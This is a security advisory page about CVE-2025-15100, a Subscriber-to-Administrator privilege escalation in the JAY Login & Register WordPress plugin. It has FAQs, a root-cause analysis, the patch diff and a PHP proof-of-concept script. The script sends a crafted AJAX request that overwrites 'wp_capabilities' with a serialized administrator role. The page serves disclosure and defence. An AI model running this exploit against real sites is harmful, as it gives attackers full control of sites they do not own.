What is CVE-2025-15100?

CVE-2025-15100 is a privilege escalation vulnerability in the JAY Login & Register plugin for WordPress, affecting versions up to and including 2.6.03. It allows authenticated users with Subscriber-level access to update arbitrary user metadata, potentially elevating their privileges to that of an administrator.

How does the vulnerability work?

The vulnerability arises from the ‘jay_panel_ajax_update_profile’ function, which lacks proper authorization checks. Authenticated users can send POST requests to update user meta without verifying if they have permission, allowing them to modify their own user capabilities.

Who is affected by this vulnerability?

Any WordPress site using the JAY Login & Register plugin version 2.6.03 or earlier is affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the JAY Login & Register plugin in your WordPress admin panel. If it is 2.6.03 or earlier, your site is at risk.

How can I fix this vulnerability?

The vulnerability is patched in version 2.6.04 of the JAY Login & Register plugin. Administrators should update to this version immediately to mitigate the risk.

What does the CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It implies that successful exploitation could lead to severe consequences, including complete site compromise.

What practical risks does this vulnerability pose?

Successful exploitation of this vulnerability could allow an attacker to gain full administrative access to a WordPress site. This access could lead to unauthorized changes, data breaches, and the installation of malicious content.

What does the proof of concept demonstrate?

The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable endpoint. It illustrates the steps required to escalate privileges by modifying user capabilities.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the JAY Login & Register plugin until it can be patched. Additionally, review user permissions and limit access to trusted users only.

Are there any additional security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation and all other plugins are up to date. Implement security plugins, regularly audit user accounts, and monitor for suspicious activity.

What are the implications of an attacker gaining administrator access?

If an attacker gains administrator access, they can manipulate site settings, install malicious plugins, access sensitive data, and potentially use the site for further attacks. This can lead to significant reputational and financial damage.

How can I stay informed about vulnerabilities like this?

Subscribe to security bulletins from WordPress, follow security-focused blogs, and participate in relevant forums to stay informed about vulnerabilities and best practices for securing WordPress sites.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15100: JAY Login & Register <= 2.6.03 – Authenticated (Subscriber+) Privilege Escalation via jay_panel_ajax_update_profile (jay-login-register)

CVE ID CVE-2025-15100

Plugin jay-login-register

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 2.6.03

Patched Version 2.6.04

Disclosed February 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15100:
The JAY Login & Register WordPress plugin, versions 2.6.03 and earlier, contains an insecure direct object reference (IDOR) vulnerability in its profile update functionality. This flaw allows authenticated users with Subscriber-level permissions or higher to modify arbitrary user metadata, leading to privilege escalation to Administrator. The vulnerability has a CVSS score of 8.8 (High).

Atomic Edge research identifies the root cause as missing authorization and input validation in the `jay_panel_ajax_update_profile()` function. The vulnerable code resides in `/includes/user-panel/jay-login-register-ajax-handler-user-panel.php`. The function processes POST parameters starting with `jay_panel_meta_` (line 899). It extracts the meta key from the parameter name and directly passes it to `update_user_meta()` (line 931) without verifying if the current user has permission to modify that specific metadata key. The function only checks if the user is logged in and has a `jay_can_edit_profile` meta value not equal to ‘0’ (lines 622-626). This allows attackers to submit requests with parameters like `jay_panel_meta_wp_capabilities` to overwrite their own user capabilities.

Exploitation requires an authenticated attacker with at least Subscriber privileges. The attack vector is a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `jay_panel_ajax_update_profile`. The attacker must include a valid WordPress nonce, which Subscriber users can obtain. The exploit payload consists of POST parameters where the key is `jay_panel_meta_wp_capabilities` and the value is a serialized PHP array representing administrator capabilities, such as `a:1:{s:13:”administrator”;b:1;}`. Upon successful execution, the attacker’s `wp_capabilities` user meta is updated, granting them full administrative rights.

The patch implements a three-layer defense mechanism across three affected files. In `jay-login-register-ajax-handler-user-panel.php`, the fix adds a whitelist (`$allowed_custom_fields`) derived from plugin-configured custom fields (lines 899-914) and a blacklist (`$disallowed_meta_keys`) containing sensitive WordPress keys like `wp_capabilities` and `wp_user_level` (lines 924-937). The code now validates each extracted meta key against these lists (lines 941-957) before allowing the update. Identical logic is applied to the `jay_panel_ajax_update_profile` function in the same file and to similar loops in `jay-login-register-ajax-handler.php` and `jay-login-register-inline-handler.php`. The patch also adds filter hooks (`jay_login_register_disallowed_meta_keys`, `jay_login_register_allowed_profile_fields`) for extensibility and a logging action for blocked attempts.

Successful exploitation results in complete site compromise. An attacker can elevate any low-privileged user account to an administrator, granting them unrestricted access to the WordPress dashboard. This allows installation of malicious plugins, theme editing, user management, database manipulation, and server-side code execution via built-in editors. The attacker can also maintain persistence, exfiltrate sensitive data, and deface the website. The vulnerability affects all sites using the vulnerable plugin versions, requiring no special configuration.

Differential between vulnerable and patched code

Code Diff

--- a/jay-login-register/includes/jay-login-register-ajax-handler.php
+++ b/jay-login-register/includes/jay-login-register-ajax-handler.php
@@ -975,19 +975,55 @@
     // الف) خواندن تنظیمات فیلدها برای تشخیص نوع آن‌ها
     $custom_fields_config = json_decode( $settings['custom_fields_global_json'] ?? '[]', true );
     $fields_map = [];
-    if ( is_array($custom_fields_config) ) {
+    $allowed_custom_fields = [];
+   if ( is_array($custom_fields_config) ) {
         foreach ($custom_fields_config as $f) {
-            $fields_map[ $f['key'] ] = $f; // آرایه‌ای برای دسترسی سریع: 'birthdate' => {config}
+            $fields_map[ $f['key'] ] = $f;
+            if ( isset($f['key']) && !empty($f['key']) ) {
+                $allowed_custom_fields[] = sanitize_key($f['key']);
+            }
         }
     }
+       // 🔒 Blacklist: کلیدهای خطرناک
+    $disallowed_meta_keys = [
+        'wp_capabilities',
+        'wp_user_level',
+        'admin_color',
+        'rich_editing',
+        'comment_shortcuts',
+        'show_admin_bar_front',
+        'session_tokens',
+        'user-settings',
+        'user-settings-time'
+    ];
+    $disallowed_meta_keys = apply_filters('jay_login_register_disallowed_meta_keys', $disallowed_meta_keys, $user_id);
+    $allowed_custom_fields = apply_filters('jay_login_register_allowed_profile_fields', $allowed_custom_fields, $user_id);
+

     foreach ($_POST as $post_key => $post_value) {
-        if ( strpos($post_key, 'meta_') === 0 ) {
+         if ( strpos($post_key, 'meta_') !== 0 ) continue;
             $real_meta_key = substr($post_key, 5);
             // باگ‌گیری: تبدیل فاصله به آندرلاین چون در POST فضاها _ می‌شوند
             $real_meta_key = str_replace(' ', '_', $real_meta_key); // اطمینان حاصل می‌کنیم
             $real_meta_key = sanitize_key($real_meta_key);
-
+
+        // 🔒 Level 1: Blacklist specific dangerous keys
+        if (in_array($real_meta_key, $disallowed_meta_keys, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $real_meta_key, $post_value);
+            continue;
+        }
+
+        // 🔒 Level 2: Block ALL wp_* keys (WordPress protected)
+        if (strpos($real_meta_key, 'wp_') === 0) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $real_meta_key, $post_value);
+            continue;
+        }
+
+        // ✅ Level 3: Only allow whitelisted fields
+        if (!in_array($real_meta_key, $allowed_custom_fields, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $real_meta_key, $post_value);
+            continue;
+        }
             if ( is_array($post_value) ) {
                 $sanitized_values = array_map('sanitize_text_field', wp_unslash($post_value));
                 update_user_meta($user_id, $real_meta_key, $sanitized_values);
@@ -995,7 +1031,7 @@
                 $raw_value = wp_unslash($post_value);
                 // استفاده از sanitize_textarea_field برای حفظ اینترها در پاراگراف
                 $final_value = sanitize_textarea_field($raw_value);
-
+
                 // بررسی تنظیمات این فیلد خاص
                 if ( isset($fields_map[$real_meta_key]) ) {
                     $field_config = $fields_map[$real_meta_key];
@@ -1014,7 +1050,7 @@
                 }

                 update_user_meta($user_id, $real_meta_key, $final_value);
-            }
+
         }
     }

--- a/jay-login-register/includes/jay-login-register-inline-handler.php
+++ b/jay-login-register/includes/jay-login-register-inline-handler.php
@@ -237,10 +237,6 @@
     // ب) ادامه روال عادی (اگر کپچا درست بود)
     // -----------------------------------------------------------

-// -----------------------------------------------------------
-    // ب) ادامه روال عادی (اگر کپچا درست بود)
-    // -----------------------------------------------------------
-
     jay_login_register_inline_check_lockout_and_die($user_input_raw, $user_ip, $settings);

  // 1. دریافت تنظیمات
@@ -424,15 +420,7 @@
     wp_send_json_success(['html' => $otp_form_html, 'validity_period' => $validity_period * 60]);
 }

-/**
- * HTML انتخاب روش
- */
-/**
- * HTML انتخاب روش دریافت کد
- */
-/**
- * HTML انتخاب روش دریافت کد
- */
+
 /**
  * HTML انتخاب روش دریافت کد
  * این تابع با گرفتن اطلاعات کامل، دکمه‌های مناسب را می‌سازد
@@ -769,21 +757,65 @@
             'display_name' => "$first_name $last_name"
         ]);
     }
-
+ // ب) ذخیره متاها با حفاظت سه‌لایه (CVE-2025-15100)
+
+    // 🔒 Blacklist: کلیدهای خطرناک
+    $disallowed_meta_keys = [
+        'wp_capabilities',
+        'wp_user_level',
+        'admin_color',
+        'rich_editing',
+        'comment_shortcuts',
+        'show_admin_bar_front',
+        'session_tokens',
+        'user-settings',
+        'user-settings-time'
+    ];
+    $disallowed_meta_keys = apply_filters('jay_login_register_disallowed_meta_keys', $disallowed_meta_keys, $user_id);
+
+    // ✅ Whitelist: فقط فیلدهای تنظیم شده در fields_config
+    $allowed_custom_fields = [];
+    if (is_array($fields_config)) {
+        foreach ($fields_config as $f) {
+            if (isset($f['key']) && !empty($f['key'])) {
+                $allowed_custom_fields[] = sanitize_key($f['key']);
+            }
+        }
+    }
+    $allowed_custom_fields = apply_filters('jay_login_register_allowed_profile_fields', $allowed_custom_fields, $user_id);
+
     // ب) ذخیره متاها
     foreach ($_POST as $key => $value) {
-        if (strpos($key, 'meta_') === 0) {
-            $meta_key = sanitize_key(substr($key, 5));
-            $field_cfg = $fields_map[$meta_key] ?? null;
-
-            if (is_array($value)) {
-                $sanitized_values = array_map('sanitize_text_field', wp_unslash($value));
-                update_user_meta($user_id, $meta_key, $sanitized_values);
-            }
-            else {
-                $raw_val = wp_unslash($value);
-                // برای پاراگراف اینترها حفظ شود
-                $sanitized_value = sanitize_textarea_field($raw_val);
+    if (strpos($key, 'meta_') !== 0) continue;
+
+        $meta_key = sanitize_key(substr($key, 5));
+        $field_cfg = $fields_map[$meta_key] ?? null;
+
+        // 🔒 Level 1: Blacklist specific dangerous keys
+        if (in_array($meta_key, $disallowed_meta_keys, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $meta_key, $value);
+            continue;
+        }
+
+        // 🔒 Level 2: Block ALL wp_* keys (WordPress protected)
+        if (strpos($meta_key, 'wp_') === 0) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $meta_key, $value);
+            continue;
+        }
+
+        // ✅ Level 3: Only allow whitelisted fields
+        if (!in_array($meta_key, $allowed_custom_fields, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $meta_key, $value);
+            continue;
+        }
+              if (is_array($value)) {
+            $sanitized_values = array_map('sanitize_text_field', wp_unslash($value));
+            update_user_meta($user_id, $meta_key, $sanitized_values);
+        }
+        else {
+            $raw_val = wp_unslash($value);
+            // برای پاراگراف اینترها حفظ شود
+            $sanitized_value = sanitize_textarea_field($raw_val);

                 if ($field_cfg) {
                     // تبدیل شماره به انگلیسی
@@ -796,7 +828,7 @@
                     }
                 }
                 update_user_meta($user_id, $meta_key, $sanitized_value);
-            }
+
         }
     }
     // 3. پاک کردن توکن امنیتی موقت (حالا که کار تمام شد)
--- a/jay-login-register/includes/user-panel/jay-login-register-ajax-handler-user-panel.php
+++ b/jay-login-register/includes/user-panel/jay-login-register-ajax-handler-user-panel.php
@@ -305,8 +305,9 @@
     $body = "کد تایید شما برای تغییر ایمیل:nn" . $otp;
     $headers = ['Content-Type: text/html; charset=UTF-8'];

-    $sent = wp_mail($current_email, $subject, nl2br($body), $headers);
-
+    $html_body = nl2br(esc_html($body));
+    $sent = wp_mail($current_email, $subject, $html_body, $headers);
+
     if (!$sent) {
         $error_msg = 'خطا در ارسال ایمیل.';
         if (isset($GLOBALS['jay_relog_mail_error'])) {
@@ -430,7 +431,8 @@
     $body = "کد تایید برای ایمیل جدید:nn" . $otp;
     $headers = ['Content-Type: text/html; charset=UTF-8'];

-    if ( ! wp_mail($new_email, $subject, nl2br($body), $headers) ) {
+    $html_body = nl2br(esc_html($body));
+    if ( ! wp_mail($new_email, $subject, $html_body, $headers) ) {
         wp_send_json_error(['message' => 'خطا در ارسال ایمیل.']);
     }

@@ -620,11 +622,12 @@
 function jay_panel_ajax_update_profile() {
     check_ajax_referer('jay_login_register_nonce_action', 'nonce');
     if ( ! is_user_logged_in() ) wp_send_json_error(['message' => 'دسترسی غیرمجاز.']);
+    $user_id = get_current_user_id();
+
     $can_edit = get_user_meta( $user_id, 'jay_can_edit_profile', true );
     if ( $can_edit === '0' ) {
         wp_send_json_error(['message' => 'شما اجازه ویرایش پروفایل خود را ندارید.']);
     }
-    $user_id = get_current_user_id();
     $user = get_userdata($user_id);
     $settings = get_option( 'jay_login_register_user_panel_settings', [] );

@@ -896,39 +899,89 @@
     elseif ($pass_to_save) update_user_meta($user_id, 'gozarname', $pass_to_save);

     // 4. ذخیره فیلدهای سفارشی (این حلقه از بالا به اینجا منتقل شد) ✅
-    foreach ($_POST as $key => $value) {
-        if (strpos($key, 'jay_panel_meta_') === 0) {
-            $meta_key = substr($key, 15); // طول 'jay_panel_meta_'
-            $meta_key = sanitize_key($meta_key);
-
-           if (is_array($value)) {
-                // برای آرایه‌ها (مثل چک‌باکس چندتایی) معمولاً اینتر مهم نیست اما این تابع امن‌تر است
-                $sanitized_value = array_map('sanitize_textarea_field', wp_unslash($value));
-                update_user_meta($user_id, $meta_key, $sanitized_value);
-            } else {
+// ===========================================================
+// 6. ذخیره فیلدهای سفارشی با لیست سفید امن
+// ===========================================================
+
+// 6.1 ایجاد لیست سفید از فیلدهای مجاز
+$allowed_custom_fields = [];
+
+// 6.2 فقط فیلدهایی که در تنظیمات پنل کاربری تعریف شده‌اند مجازند
+if (is_array($custom_fields)) {
+    foreach ($custom_fields as $field) {
+        if (isset($field['key']) && !empty($field['key'])) {
+            $key = sanitize_key($field['key']);
+            $allowed_custom_fields[] = $key;
+        }
+    }
+}
+
+// 6.3 افزودن فیلدهای سیستمی مجاز (در صورت نیاز)
+    $allowed_custom_fields = array_unique($allowed_custom_fields);
+
+    // 6.4 هوک برای توسعه‌دهندگان - این رو اضافه کن
+    $allowed_custom_fields = apply_filters('jay_login_register_allowed_profile_fields', $allowed_custom_fields, $user_id);
+
+// 6.4 مسدود کردن کلیدهای حساس وردپرس (Blacklist مهم)
+$disallowed_meta_keys = [
+    'wp_capabilities',
+    'wp_user_level',
+    'admin_color',
+    'rich_editing',
+    'comment_shortcuts',
+    'show_admin_bar_front',
+    'session_tokens',
+    'user-settings',
+    'user-settings-time'
+];
+    // 6.6 هوک برای لیست غیرمجاز - این رو اضافه کن
+    $disallowed_meta_keys = apply_filters('jay_login_register_disallowed_meta_keys', $disallowed_meta_keys, $user_id);
+
+// 6.5 همچنین مسدود کردن هر کلیدی که با wp_ شروع می‌شود
+foreach ($_POST as $key => $value) {
+    if (strpos($key, 'jay_panel_meta_') === 0) {
+        $meta_key = substr($key, 15);
+        $meta_key = sanitize_key($meta_key);
+
+        // بررسی 1: مسدود کردن کلیدهای حساس
+        if (in_array($meta_key, $disallowed_meta_keys, true)) {
+            continue; // رد کردن این فیلد
+        }
+
+        // بررسی 2: مسدود کردن کلیدهایی که با wp_ شروع می‌شوند
+        if (strpos($meta_key, 'wp_') === 0) {
+            continue; // رد کردن این فیلد
+        }
+
+        // بررسی 3: فقط کلیدهای موجود در لیست سفید مجازند
+        if (!in_array($meta_key, $allowed_custom_fields, true)) {
+            continue; // رد کردن این فیلد
+        }
+
+        // 6.6 اعتبارسنجی و ذخیره ایمن
+        if (is_array($value)) {
+            $sanitized_value = array_map('sanitize_textarea_field', wp_unslash($value));
+        } else {
             $sanitized_value = sanitize_text_field(wp_unslash($value));
-
-                // چک کردن اینکه آیا این فیلد از نوع "شماره" است؟
-                // باید آرایه فیلدها را جستجو کنیم. برای سرعت، فرض می‌کنیم اگر فقط عدد بود نرمالایز شود
-                // یا بهتر: دوباره از کانفیگ چک کنیم (کد زیر دقیق‌تر است)
-
-                $is_number_field = false;
-                foreach ($custom_fields as $cf) {
-                    if ($cf['key'] === $meta_key && isset($cf['type']) && $cf['type'] === 'number') {
-                        $is_number_field = true;
-                        break;
-                    }
-                }
-
-                if ($is_number_field) {
-                    $sanitized_value = jay_login_register_normalize_numbers($sanitized_value);
+
+            // برای فیلدهای عددی، اعداد فارسی به انگلیسی تبدیل شوند
+            $is_number_field = false;
+            foreach ($custom_fields as $cf) {
+                if (isset($cf['key']) && $cf['key'] === $meta_key && isset($cf['type']) && $cf['type'] === 'number') {
+                    $is_number_field = true;
+                    break;
                 }
-
-                update_user_meta($user_id, $meta_key, $sanitized_value);
+            }
+
+            if ($is_number_field) {
+                $sanitized_value = jay_login_register_normalize_numbers($sanitized_value);
             }
         }
+
+        // 6.7 ذخیره نهایی
+        update_user_meta($user_id, $meta_key, $sanitized_value);
     }
-
+}
     // --- Developer Hook: Action after profile update ---
     do_action( 'jay_login_register_after_profile_update', $user_id, $_POST );
     wp_send_json_success(['message' => 'تغییرات با موفقیت ذخیره شد.', 'redirect' => true]);
--- a/jay-login-register/jay-login-register.php
+++ b/jay-login-register/jay-login-register.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name:       JAY Login & Register
  * Description:       All-in-One Mobile OTP Login, Registration & Content Restriction plugin. Supports SMS, Email, Google, Digits & WooCommerce with Inline Forms.
- * Version:           2.6.03
+ * Version:           2.6.04
  * Author:            Jayarsiech
  * Author URI:        https://instagram.com/jayarsiech
  * License:           GPL v2 or later
@@ -10,12 +10,12 @@
  * Text Domain:       jay-login-register
  * Plugin Slug:       jay-login-register
  * Domain Path:       /languages
- */
+ */

 // Exit if accessed directly.
 if ( ! defined( 'ABSPATH' ) ) exit;

-define( 'JAY_LOGIN_REGISTER_VERSION', '2.6.03' );
+define( 'JAY_LOGIN_REGISTER_VERSION', '2.6.04' );
 define( 'JAY_LOGIN_REGISTER_PATH', plugin_dir_path( __FILE__ ) );
 define( 'JAY_LOGIN_REGISTER_URL', plugin_dir_url( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15100 - JAY Login & Register <= 2.6.03 - Authenticated (Subscriber+) Privilege Escalation via jay_panel_ajax_update_profile

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'attacker_subscriber';
$password = 'attacker_password';

// Step 1: Authenticate and obtain WordPress nonce and cookies.
// This script assumes the attacker has valid Subscriber credentials.
// In a real scenario, the nonce must be scraped from a page where the plugin's user panel is loaded.

// For demonstration, we set these variables. A full PoC would require a login flow.
$wordpress_nonce = 'YOUR_VALID_NONCE_HERE'; // Obtain from page source containing 'jay_login_register_nonce_action'
$cookies = 'wordpress_logged_in_xyz=...'; // Session cookie after login

// Step 2: Craft the exploit payload.
// The parameter name must start with 'jay_panel_meta_' followed by the target meta key.
// The value for wp_capabilities is a serialized PHP array granting administrator role.
$exploit_payload = [
    'action' => 'jay_panel_ajax_update_profile',
    'nonce' => $wordpress_nonce,
    'jay_panel_meta_wp_capabilities' => 'a:1:{s:13:"administrator";b:1;}' // Serialized administrator capabilities
];

// Step 3: Send the malicious AJAX request.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
]);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Check response.
echo "HTTP Code: $http_coden";
echo "Response: $responsen";
// A successful response will be a JSON object with a success message in Persian.
// The attacker should then verify admin access by visiting /wp-admin/.

?>

Frequently Asked Questions

What is CVE-2025-15100?
Overview of the vulnerability
CVE-2025-15100 is a privilege escalation vulnerability in the JAY Login & Register plugin for WordPress, affecting versions up to and including 2.6.03. It allows authenticated users with Subscriber-level access to update arbitrary user metadata, potentially elevating their privileges to that of an administrator.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the ‘jay_panel_ajax_update_profile’ function, which lacks proper authorization checks. Authenticated users can send POST requests to update user meta without verifying if they have permission, allowing them to modify their own user capabilities.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the JAY Login & Register plugin version 2.6.03 or earlier is affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the JAY Login & Register plugin in your WordPress admin panel. If it is 2.6.03 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.6.04 of the JAY Login & Register plugin. Administrators should update to this version immediately to mitigate the risk.
What does the CVSS score of 8.8 mean?
Understanding severity levels
A CVSS score of 8.8 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It implies that successful exploitation could lead to severe consequences, including complete site compromise.
What practical risks does this vulnerability pose?
Potential impacts on a site
Successful exploitation of this vulnerability could allow an attacker to gain full administrative access to a WordPress site. This access could lead to unauthorized changes, data breaches, and the installation of malicious content.
What does the proof of concept demonstrate?
Illustrating the vulnerability
The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable endpoint. It illustrates the steps required to escalate privileges by modifying user capabilities.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the JAY Login & Register plugin until it can be patched. Additionally, review user permissions and limit access to trusted users only.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, ensure that your WordPress installation and all other plugins are up to date. Implement security plugins, regularly audit user accounts, and monitor for suspicious activity.
What are the implications of an attacker gaining administrator access?
Understanding the consequences
If an attacker gains administrator access, they can manipulate site settings, install malicious plugins, access sensitive data, and potentially use the site for further attacks. This can lead to significant reputational and financial damage.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
Subscribe to security bulletins from WordPress, follow security-focused blogs, and participate in relevant forums to stay informed about vulnerabilities and best practices for securing WordPress sites.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations